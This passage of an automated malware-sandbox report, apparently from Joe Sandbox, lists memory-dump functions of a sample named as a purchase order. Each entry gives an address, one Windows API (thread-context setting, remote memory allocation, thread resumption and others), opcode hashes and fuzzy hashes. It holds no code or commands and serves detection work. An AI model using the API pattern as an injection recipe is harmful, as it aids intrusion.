Instruction Fuzzy Hash: EE21F8B19003599FCB10DFAAC845ADEFBF5FF48310F108429E559A7250C7759544CFA5

Function 0710C878 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0710C8F6

Memory Dump Source

Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a94030b14ca8c8ae9963a0f836cffa6ef4a51c34969502bb669b4868350e1d24
Instruction ID: 8deaeb6028f31c1bc8ea841c394336c7601b77519bed2ca6455dd40e1b5c5034
Opcode Fuzzy Hash: a94030b14ca8c8ae9963a0f836cffa6ef4a51c34969502bb669b4868350e1d24
Instruction Fuzzy Hash: 2F2138B1D003098FDB10DFAAC4857EEBBF4EF48324F10842AD459A7280CB789944CFA5

Function 00F9D3A0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F9D427

Memory Dump Source

Source File: 00000000.00000002.1776822682.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 77c25db9ca6322baefff2a631d20dbec517ebc541dee5cc5f7a721d0bc8516c9
Instruction ID: 396aa6024f99d86fd66c877cb7499125205d0763c66e978ff05a0b02567161df
Opcode Fuzzy Hash: 77c25db9ca6322baefff2a631d20dbec517ebc541dee5cc5f7a721d0bc8516c9
Instruction Fuzzy Hash: 7C21C2B59002589FDB10CFAAD984ADEFBF8EB48320F14841AE958A7350D375A944CFA5

Function 0B883A69 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0B883A95

Memory Dump Source

Source File: 00000000.00000002.1788818288.000000000B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b880000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 76d200009f03cf5fcf69d18d77d0bc63ef925f7bc29852fdbc8d8f0264385779
Instruction ID: c9be5eab2e25edf33acab916c2b06854d5862df241af336a9197d1b127d27fd7
Opcode Fuzzy Hash: 76d200009f03cf5fcf69d18d77d0bc63ef925f7bc29852fdbc8d8f0264385779
Instruction Fuzzy Hash: 8C115E353145508FC719BB3DC8548AA77AAAFC5A1131500AEE501CB3B2EE66CC02C795

Function 075131C0 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetClassInfoW.USER32(?,00000000), ref: 0751323C

Memory Dump Source

Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: c9b7cc912bd32df1d8626d99e6a8728b9e5f188d9fe21e6d2afb45d5284b2a96
Instruction ID: 27d8eb15a388be4c60e95e685222cc01d9f45d16f1ae2acf3e7c814372843671
Opcode Fuzzy Hash: c9b7cc912bd32df1d8626d99e6a8728b9e5f188d9fe21e6d2afb45d5284b2a96
Instruction Fuzzy Hash: 952115B19017199FDB10DF9AC884ADEFBF4FB48310F14806AE858A7240D375A944CB64

Function 07514818 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

MonitorFromPoint.USER32(?,?,00000002), ref: 075148A7

Memory Dump Source

Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: FromMonitorPoint
String ID:
API String ID: 1566494148-0
Opcode ID: b33047c406af83be46ad62e7317b910e945f27399650c2b0965ea1703835c8aa
Instruction ID: 2a745af02d2a0b27f4d3ca25df019bc60785aff81c5ec09ef35b04d7e094b338
Opcode Fuzzy Hash: b33047c406af83be46ad62e7317b910e945f27399650c2b0965ea1703835c8aa
Instruction Fuzzy Hash: 972145B09003899FDB10DF99D449BEEBBF4FB48314F20841AE859AB641C775A945CFA1

Function 0751C222 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?), ref: 0751C299

Memory Dump Source

Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: b3e221e15e7846e3665cc78fa269eea34c2f8e47db89be8d9056516e6356f4a0
Instruction ID: 505838956b3942bb52043480d4f2963b989479160d29496d115d463698d98687
Opcode Fuzzy Hash: b3e221e15e7846e3665cc78fa269eea34c2f8e47db89be8d9056516e6356f4a0
Instruction Fuzzy Hash: DC2158B5900209CFDB14CFAAC844BEEFBF5BB88320F14842AD468A7350D779A945CF65

Function 0751C228 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?), ref: 0751C299

Memory Dump Source

Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: 804ef4c44b819cf9b920e10560e5101384b883bf5329ef58e13650a227e3e85d
Instruction ID: b7efec7ca61a4533c7591f4b9344440caee7f495013911b189b40cc209e29745
Opcode Fuzzy Hash: 804ef4c44b819cf9b920e10560e5101384b883bf5329ef58e13650a227e3e85d
Instruction Fuzzy Hash: 0C2106B19002198FDB14DF9AC844BEEFBF5FB88320F14842AD468A7350D779A945CFA5

Function 075141DF Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 07514259

Memory Dump Source

Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: d97aa5155a89ad40552e22c037af768006178286574fe76d8ee2aaacb783e163
Instruction ID: 0edfeb6619ffb20f4f5479df28bc11e727850258a41932dd4819505208978070
Opcode Fuzzy Hash: d97aa5155a89ad40552e22c037af768006178286574fe76d8ee2aaacb783e163
Instruction Fuzzy Hash: A921CDB09043858EDB11AFA8C4082EEBFF1BB84311F24485AC46AA7340CB318584CFA5

Function 00F9B159 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00F9B126

Memory Dump Source

Source File: 00000000.00000002.1776822682.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b738cb3d894aeb7b708e68ed51262bf6057873cdc175d3f22e507710b5b9d80e
Instruction ID: 9564a30b8a05592ffc3071fcfce243dea3bad473b01e87a440cbdf7686cc77f3
Opcode Fuzzy Hash: b738cb3d894aeb7b708e68ed51262bf6057873cdc175d3f22e507710b5b9d80e
Instruction Fuzzy Hash: 93110472A042448FFF10DB69E9107EEBBF5AFC5324F14845ED44497252C7749845DFA0

Function 0B883A78 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0B883A95

Memory Dump Source

Source File: 00000000.00000002.1788818288.000000000B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b880000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 1e592fa7705a64b6e883667235351b14d22670b8a493f644db164921bec7a8e3
Instruction ID: 3f06b76bfa09d1550d3b56f04eab8975b0ddad574a2461e8af06b85efd3b7ca7
Opcode Fuzzy Hash: 1e592fa7705a64b6e883667235351b14d22670b8a493f644db164921bec7a8e3
Instruction Fuzzy Hash: E911DB343109118FC619AA3DC55486E77EAAFC5A1531540AAE902CB3B6EE76DC028795

Function 075141F0 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 07514259

Memory Dump Source

Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 325d4c39113cbdc3f797ae2beff0e18007fb30ad8c0b45171bf20dc8d74b2c7c
Instruction ID: 62045e76753fb9d5ba2a985057d314148b5fdf8fd1a51101c4d0da459320537c
Opcode Fuzzy Hash: 325d4c39113cbdc3f797ae2beff0e18007fb30ad8c0b45171bf20dc8d74b2c7c
Instruction Fuzzy Hash: 8D116AB49003498FDB10AFA9C5486DEBFF5BB88311F64885AD42AA7340DB359584CFA5

Function 0702041C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0702311A,?,?,?,?,?), ref: 070231BF

Memory Dump Source

Source File: 00000000.00000002.1787278728.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7020000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: e93ea4ec0f78accafe1a345f099650f5895c9af42a6b39d35fd2439dd68e3f6b
Instruction ID: 5cecea221d2854d59b6d9c0c1d42e9c69173668e58a3fa5ac1a8da58e95dd06a
Opcode Fuzzy Hash: e93ea4ec0f78accafe1a345f099650f5895c9af42a6b39d35fd2439dd68e3f6b
Instruction Fuzzy Hash: EE1137B29002599FDB10DF9AC844BDEFFF8EB48320F14841AE954A7210C379A954DFA5

Function 075130E0 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 0751314A

Memory Dump Source

Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 890e7fcc573e1820fdcbf637c474c20cf3b6adb02b2817f81bc534771bc49349
Instruction ID: cc50c88b24aa88de485e62cc4cdc686fed270c5f02411c447c7530e61b8ba0fb
Opcode Fuzzy Hash: 890e7fcc573e1820fdcbf637c474c20cf3b6adb02b2817f81bc534771bc49349
Instruction Fuzzy Hash: 021123B69002099FDB10CF9AC844BDEFBF4FB88320F11C42AE858A7240D378A545CFA5

Function 0710C950 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0710C9BE

Memory Dump Source

Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ea7d09ede94ebbfb2c686dfaa8f36b508ec94ac88010ce72c1b4a96e30f42ca2
Instruction ID: da49c40304564cafa533fd9cf2799391df72146034b584b9905c099827656369
Opcode Fuzzy Hash: ea7d09ede94ebbfb2c686dfaa8f36b508ec94ac88010ce72c1b4a96e30f42ca2
Instruction Fuzzy Hash: E51126B29002499FCB10DFAAC844ADEBBF5EB88324F108819E559A7250C775A544CFA4

Function 0C466402 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,?,?,?), ref: 0C466470

Memory Dump Source

Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: cf11e00b314a576c6a1ae08c1aeab76d0eeee752fbedb180ce437b78afd2ce6b
Instruction ID: 4f959550c05a7e8669113bde4d93fa8fd094639d6e4f387fb804ec1756bde72c
Opcode Fuzzy Hash: cf11e00b314a576c6a1ae08c1aeab76d0eeee752fbedb180ce437b78afd2ce6b
Instruction Fuzzy Hash: 3A11F3B6900249DFDB10CF9AD584BDEFBF4FB48320F10842AE558A7650C378A644CFA5

Function 0C466408 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,?,?,?), ref: 0C466470

Memory Dump Source

Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 57aeba728d5824408563353571b1b5c63029493e904dedc83e11497a4fd86fce
Instruction ID: 1147604f3b72c27e1e931d8c78e48772a000f044f2d1e3569a926133869c2dfd
Opcode Fuzzy Hash: 57aeba728d5824408563353571b1b5c63029493e904dedc83e11497a4fd86fce
Instruction Fuzzy Hash: E011F3B58002499FDB10CF9AD944BDEFBF8FB48320F10842AE958A7650C378A544CFA5

Function 0C4667A2 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0C46680D

Memory Dump Source

Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 66a3139cc9d7739d595e735a2e4efe41a69596702e2f1394a418f22615f6e828
Instruction ID: b2342d9e47d10316f2bf26199e18aad6395892725e86e59027cf7495dc5a6cde
Opcode Fuzzy Hash: 66a3139cc9d7739d595e735a2e4efe41a69596702e2f1394a418f22615f6e828
Instruction Fuzzy Hash: 4611E4B59002498FDB10CFAAD444BDEFBF4BB48320F11842AE554A7650C378A544CFA5

Function 0C4667A8 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0C46680D

Memory Dump Source

Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6efb262445bcf0fe077e4bb3503bc5c05c4efb41dd011bbce96fb873586a511d
Instruction ID: 9b8c9d4f370a948f26e3907411cf720fbf2677b9c483049826b1b7d0ebda906b
Opcode Fuzzy Hash: 6efb262445bcf0fe077e4bb3503bc5c05c4efb41dd011bbce96fb873586a511d
Instruction Fuzzy Hash: 5A11C3B59002499FDB10DF9AD844BDEFBF8FB48320F11842AE958A7650C378A944CFA5

Function 02B61F30 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 02B61F95

Memory Dump Source

Source File: 00000000.00000002.1777362060.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b60000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 5ee90cc4f63443b07440524548759a27ad84b713e206f26b1ae46a81219a3d0c
Instruction ID: f4dd056544859f32c5235c6e68d338a3be1d6b7861c2ed78eea5703045b8a8b9
Opcode Fuzzy Hash: 5ee90cc4f63443b07440524548759a27ad84b713e206f26b1ae46a81219a3d0c
Instruction Fuzzy Hash: 171116B58002489FCB10CFA9C589BEEBFF4EB49324F24855AD959A7301C379A945CFA4

Function 0710C390 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 0710C3F2

Memory Dump Source

Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4893e61a6755c99b96797cb53413e3da84fb9142af9593304cd4013723a1083d
Instruction ID: 94a0c1f7628eab005857c1ae941304623b6ba162a127833bda3be013eb9a634d
Opcode Fuzzy Hash: 4893e61a6755c99b96797cb53413e3da84fb9142af9593304cd4013723a1083d
Instruction Fuzzy Hash: 17113AB19002498FCB10DFAAC4457DFFBF5EB88324F208419D459A7250CB75A544CFA4

Function 0C461220 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0C46127D

Memory Dump Source

Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: dda72adae40937236096c16423c8e70579c812816e93b11dfb8810b37e8f7db0
Instruction ID: db427d2d231b97291b0d549f1f1065f58cc8551384b8a1aea33e0cc9aaf5821d
Opcode Fuzzy Hash: dda72adae40937236096c16423c8e70579c812816e93b11dfb8810b37e8f7db0
Instruction Fuzzy Hash: 5D11E3B58003499FDB10CF9AC845BEEFBF8EB48320F10841AE558A7650D379A584CFA5

Function 00F9B0C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00F9B126

Memory Dump Source

Source File: 00000000.00000002.1776822682.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ac952ea24af6ee9ad31cea8a5edae6494627f5c7a871eee9b7601fb51532aa33
Instruction ID: 63e10648b135f672c9f048cd33a28e29ea6cd01ce620143d09f503ce0f637f49
Opcode Fuzzy Hash: ac952ea24af6ee9ad31cea8a5edae6494627f5c7a871eee9b7601fb51532aa33
Instruction Fuzzy Hash: 4C11E0B5C003498FDB10DF9AD944ADEFBF4AF89324F10842AD459B7210D375A585CFA5

Function 0751DB10 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0751DB75

Memory Dump Source

Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 63e17aae9984391f983222ff33ff41b5d00e2a033b9243ab8493fa223c8f21f8
Instruction ID: b733d1dd920fc3b17ab6fd063b8c20fadac03d6ed42f3b978b491e46779de82f
Opcode Fuzzy Hash: 63e17aae9984391f983222ff33ff41b5d00e2a033b9243ab8493fa223c8f21f8
Instruction Fuzzy Hash: 4111FEB99003499FDB10CF99D484BDEBBF4FB48320F10885AD559A7250C375AA84CFA5

Function 0751DB18 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0751DB75

Memory Dump Source

Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: e37d5c50e698d2e03a109ceb563cf1e7b52a3ff9089c21de10e99e892f7f81dc
Instruction ID: 9c391fb7b9ebebd3ec30e6832b39cef260a29cd5ec507bd6dd10ef10d6da51d2
Opcode Fuzzy Hash: e37d5c50e698d2e03a109ceb563cf1e7b52a3ff9089c21de10e99e892f7f81dc
Instruction Fuzzy Hash: 1B11D0B59003499FDB10DF9AC885BDEFBF8FB48324F10841AE559A7250C375A984CFA5

Function 02B61F38 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 02B61F95

Memory Dump Source

Source File: 00000000.00000002.1777362060.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b60000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 5bf1cb129dac9118a45c3c05b27d594f32fc74aae7bf1b6a7f85a7e724163a92
Instruction ID: 20e3738a89be56f838202671386d988813992a8cf26975c51263304f0141e211
Opcode Fuzzy Hash: 5bf1cb129dac9118a45c3c05b27d594f32fc74aae7bf1b6a7f85a7e724163a92
Instruction Fuzzy Hash: C71103B5800248CFDB10DF9AC588BDEFBF8EB48324F10845AE958A7300C379A944CFA5

Function 0C466C80 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 0C466CDD

Memory Dump Source

Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 65e3774713cbb491734a4ecf578d4f413f3e6f6d71e61f713ec1d51c1b4cc594
Instruction ID: 64fea209f26420fa11e846c5379c4f66aa80c81537e4562b78a31b8d19d0a370
Opcode Fuzzy Hash: 65e3774713cbb491734a4ecf578d4f413f3e6f6d71e61f713ec1d51c1b4cc594
Instruction Fuzzy Hash: 07110DB1C006498FCB10DF9AD444BCEFBF4FB48324F10842AE868A7210C378A544CFA6

Function 0C466C79 Relevance: 1.5, APIs: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 0C466CDD

Memory Dump Source

Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 144a7337bb8b9847310bb286f8f391f260080f7a223f25d45ae06bc7358dc14e
Instruction ID: d5e941e1d6a4f8a267c533a876dc51b50e52516e3fd0b8359780f2673d178e09
Opcode Fuzzy Hash: 144a7337bb8b9847310bb286f8f391f260080f7a223f25d45ae06bc7358dc14e
Instruction Fuzzy Hash: F21100B5D00649CFDB10CF9AD544BCEFBF4BB48324F10842AD468A7210D378A644CFA6

Function 070223EF Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 07022422

Memory Dump Source

Source File: 00000000.00000002.1787278728.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7020000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 76d2e49f81f9ae6f0eb6f46c83a14c850842936696df7e830e188a71b9a3d229
Instruction ID: 9764cac4b159f18024694901ba3338a1b173228557e0e3f21fd0d1a8e7f7f934
Opcode Fuzzy Hash: 76d2e49f81f9ae6f0eb6f46c83a14c850842936696df7e830e188a71b9a3d229
Instruction Fuzzy Hash: BAE0D8F27506205FCB249E7894589BB3FBDDF84A6070602AAA445C7395DD61CC03CB50

Function 07020358 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 07022422

Memory Dump Source

Source File: 00000000.00000002.1787278728.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7020000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: d60969c25acc216d36da8568573ce40202e947cf43132498a3583b213de2d95b
Instruction ID: 63c94a65423d7d7b5973c1b64ec361473ae5cf3134fae5070371191b08b8a79d
Opcode Fuzzy Hash: d60969c25acc216d36da8568573ce40202e947cf43132498a3583b213de2d95b
Instruction Fuzzy Hash: D2E026B23603245B8A28AB79880883B76ADEF85F1034046AAE506CB350CD60EC028798

Function 00EFD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776625651.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_efd000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e62a3d168dcc56fac58c708b7a806dde14f4d9184a3bfd26b5087ed98d100d1e
Instruction ID: 966dbe1ec4a158a2d44f35a095705c520b10b6405b0a30838fc6fe555e3fb1f5
Opcode Fuzzy Hash: e62a3d168dcc56fac58c708b7a806dde14f4d9184a3bfd26b5087ed98d100d1e
Instruction Fuzzy Hash: 6D212571508248DFCB05DF14DDC0B3ABF66FB98318F20C569EA095B256C336D856DAA2

Function 00F0D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776657271.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0d000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb77d9e8bf799c889e3a56172d31bb781724fa07c8a1d299aafc6334e9343bf1
Instruction ID: 7eb8f9a5fc6ec17b7ee9e4db3792ed2e6429f3c98be67d6494cf99e70cce43bb
Opcode Fuzzy Hash: eb77d9e8bf799c889e3a56172d31bb781724fa07c8a1d299aafc6334e9343bf1
Instruction Fuzzy Hash: 4F212671904304EFDB05DF94D9C0B26FBA5FB84324F20C66DE8094B2D6C336D846EA61

Function 00F0D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776657271.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0d000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d12ec2949d54f962e654e35b61107ec3537549063633cbab83fc12e9a0b0ea8
Instruction ID: f1e31ac3beaea8961488b4b34d9d73ec3687140c7bdd41c3715c590cc93b1642
Opcode Fuzzy Hash: 9d12ec2949d54f962e654e35b61107ec3537549063633cbab83fc12e9a0b0ea8
Instruction Fuzzy Hash: 5F21F271604200DFDB14DF54D984B26BBA5EB84324F20C569D84E4B29AC33AD847EA62

Function 00F0D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

